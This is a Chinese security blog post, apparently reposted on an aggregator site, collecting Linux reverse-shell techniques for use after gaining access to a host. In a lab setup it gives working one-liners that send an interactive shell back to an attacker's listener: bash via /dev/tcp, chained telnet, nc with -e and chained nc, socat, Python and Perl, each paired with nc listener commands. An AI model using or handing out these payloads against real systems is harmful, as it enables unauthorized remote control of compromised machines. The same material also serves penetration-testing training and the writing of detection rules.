【安全知识】——LInux的shell反弹姿势合集(更新中)

这篇具有很好参考价值的文章主要介绍了【安全知识】——LInux的shell反弹姿势合集(更新中)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

作者名:白昼安全
主页面链接: 主页传送门
座右铭:
不要让时代的悲哀成为你的悲哀
专研方向: web安全,后渗透技术
每日鸡汤: 
宇宙有宇宙的规律,我也有我的坚持

【安全知识】——LInux的shell反弹姿势合集(更新中)

当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。

下面给大家列举一些平时用的比较多的shell反弹方法

这里的演示环境为

目标机器:centos        192.168.149.133 

攻击机器:kali          192.168.149.129

 一、Bash反弹

条件:

当前用户有足够的权限执行bash命令

当前的shell环境需要是bash shell下,不是bash shell的话会导致报错,提示没有该目录或文件夹

例如kali默认的就是zsh shell,所以如果想把kali的shell用bash反弹出去的话需要先用bash命令进入bash shell才能使用bash反弹shell,如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

 1、攻击机上执行监听

nc -lnvp port

"port"为监听的端口号

【安全知识】——LInux的shell反弹姿势合集(更新中)

2、目标机器上使用bash反弹shell

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

bash -i 打开一个交互的bash

>& 将标准错误输出重定向到标准输出

/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口

0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

 【安全知识】——LInux的shell反弹姿势合集(更新中)

 3、效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

二、telnet反弹

Telnet 是一种用于远程登录到计算机系统的网络协议和命令行工具。使用 Telnet,您可以在本地计算机上打开终端窗口,然后通过 Internet 或局域网连接到其他计算机。

Telnet 命令可用于连接到远程计算机并执行各种操作,例如运行命令、编辑文件或查看系统信息。您可以使用 Telnet 客户端应用程序来发起 Telnet 会话,并在会话期间发送命令和接收输出。简单来说就是ssh的前身

条件:目标机器上存在telnet服务 

1、 攻击者主机上打开两个终端分别执行监听

nc -lnvp port1
nc -lnvp port2

【安全知识】——LInux的shell反弹姿势合集(更新中)

监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip 

2、目标主机中执行

telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555

【安全知识】——LInux的shell反弹姿势合集(更新中)

3、效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

 在4444的监听终端输入指令,即可在5555的监听终端查看指令结果

 三、nc反弹

1、支持-e参数

如果目标机器上的nc支持-e参数,如下就可以直接反弹

攻击机执行

nc -lnvp 端口

【安全知识】——LInux的shell反弹姿势合集(更新中)

目标机器执行如下命令反弹shell

nc -e /bin/bash x.x.x.x port 

【安全知识】——LInux的shell反弹姿势合集(更新中)

 效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

 2、不支持-e参数

这里讲的就是另外一种情况,目标机器上有nc,但是nc的版本不支持e参数,这里就给大家介绍一个技巧——NC串连

kali攻击机上开启两个终端监听不同端口分别用于接收输入和输出

 【安全知识】——LInux的shell反弹姿势合集(更新中)

目标机器上使用nc串联反弹权限 

nc 客户端的ip 第一个端口|/bin/bash |nc 客户端的ip  第二个端口

【安全知识】——LInux的shell反弹姿势合集(更新中)
 

详细给大家讲一下服务端执行这条命令的意思 

语句的前半部分服务端nc将shell回弹到客户端ip的第一个端口,此时客户端开启对第一个端口的监听并成功建立连接(但这里并不是交互式shell,看不到命令执行的结果),语句后半部分意思就是将用户在第一个端口建立的shell上的命令执行结果作为第二个端口的输出内容,此时用户再用客户端nc监听并连接第二个端口,这样就可以实现攻击者在第一个端口输入命令,在第二个端口就能看到命令执行的结果

效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中) 这样我们再4567端口的监听页面输入的命令的回显结果就会在1234端口的监听页面显示

这招巨好用,大家可以多看看或者下去自己试一下 

四、socat反弹

socat是一个用于数据转发的命令行工具,它可以在两个端口之间建立虚拟通道,将数据从一个端口转发到另一个端口,同时支持很多网络协议。

1、攻击机开启监听

【安全知识】——LInux的shell反弹姿势合集(更新中)

2、目标机器使用socat反弹shell

 执行如下命令

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:port

 x.x.x.x是攻击机的ip

port是攻击机开启的监听端口

【安全知识】——LInux的shell反弹姿势合集(更新中) 3、效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

 五、Python反弹

1、攻击机开启监听

 nc -lnvp port

我这里用的是

nc -lnvp 1234 

2、目标机器使用python反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('x.x.x.x',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

  x.x.x.x是攻击机的ip

port是攻击机开启的监听端口

 【安全知识】——LInux的shell反弹姿势合集(更新中)

3、效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

六、PHP反弹

 

1、攻击机开启监听

nc -lnvp port

2、目标机器上使用php反弹shell

【安全知识】——LInux的shell反弹姿势合集(更新中) 

3、效果如下

【安全知识】——LInux的shell反弹姿势合集(更新中)

七、Perl反弹 

1、攻击机开启监听

nc -lnvp port

2、目标机器上使用perl反弹shell

perl -e 'use Socket;$i="x.x.x.x";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

【安全知识】——LInux的shell反弹姿势合集(更新中) 

即可成功拿到目标shell,效果与php反弹shell差不多,文章篇幅原因就不附图了文章来源地址https://www.toymoban.com/news/detail-448608.html

到了这里,关于【安全知识】——LInux的shell反弹姿势合集(更新中)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 中间件安全:Apache Tomcat 弱口令.(反弹 shell 拿到服务器的最高控制权.)

    Tomcat  是 Apache 软件基金会(Apache Software Foundation)的 Jakarta 项目中的一个核心项目,由 Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署 war 包 geshell . 中间件安全:Apache Tomcat 弱口令. Apache Tomcat 弱口令: 靶场准备:Web安全:Vulfocus 靶场搭建.(漏

    2024年02月05日
    浏览(51)
  • [网络安全] DVWA之Content Security Policy (CSP) Bypass 攻击姿势及解题详析合集

    CSP 是 Content Security Policy(内容安全策略)的缩写,是一种用于增强 Web 应用程序安全性的安全机制。它通过允许网站管理员控制页面中加载内容的来源来减少跨站脚本攻击(XSS)等常见的安全风险。 CSP 的工作原理是通过定义一组策略规则,指定哪些来源可以被信任和允许加

    2024年02月05日
    浏览(39)
  • 【shell编程学习】反弹shell

    机器 IP win10虚拟机 192.168.242.129 攻击机 centos 虚拟机 192.168.242.131 靶机 1,win10机器安装Ncat 来监听端口 简单来说,就是下载netcat 安装包,解压,将nc.exe 复制到C:WindowsSystem32的文件夹下。即可使用nc命令来监听端口。  windows环境下nc全称netcat 安装及使用 - 疯狂の猿猴  监听命令

    2024年02月06日
    浏览(28)
  • 反弹shell原理与实现

    反弹shell(Reverse Shell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行

    2024年02月05日
    浏览(30)
  • 059 提权与反弹shell

    在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,对于渗透来说,获得的权限越高,控制的服务器就会越多。 网站首先通过漏洞获取webshell,然后通过shell进行提权。 计算机中的权限: 匿名访问权限 来宾权限 用户权限 管理员权限 系统权限 水平权限提升(越权)

    2024年02月07日
    浏览(30)
  • 交互式shell与非交互式shell,反弹shell

    交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是因为shell与用户进行交互。 这种模式也是大多数用户非常熟悉的:登录、执行一些命令、签退。当签退后,shell也终止了。 需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输

    2024年02月02日
    浏览(42)
  • 入侵检测——如何实现反弹shell检测?

    反弹shell的本质:就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell的结果:一个client上的bash进程 可以和 server上的进程通信。

    2024年02月13日
    浏览(33)
  • Windows的几种常用反弹shell方法

    简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互

    2024年02月12日
    浏览(31)
  • kali /mac 成功的反弹shell语句

    mac :192.168.19.107 kali:192.168.19.111 kali 监听mac : nc -lvvp 6666 mac执行: 1: mknod backpipe p nc 192.168.19.111 6666 0backpipe | /bin/bash 1backpipe  2: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.19.111 6666 /tmp/f 3: rm -f /tmp/p; mknod /tmp/p p nc 192.168.19.111 6666 0/tmp/p 21 该语句在监听机器上执行的语句会同步

    2024年04月22日
    浏览(26)
  • 通过python获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(28)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包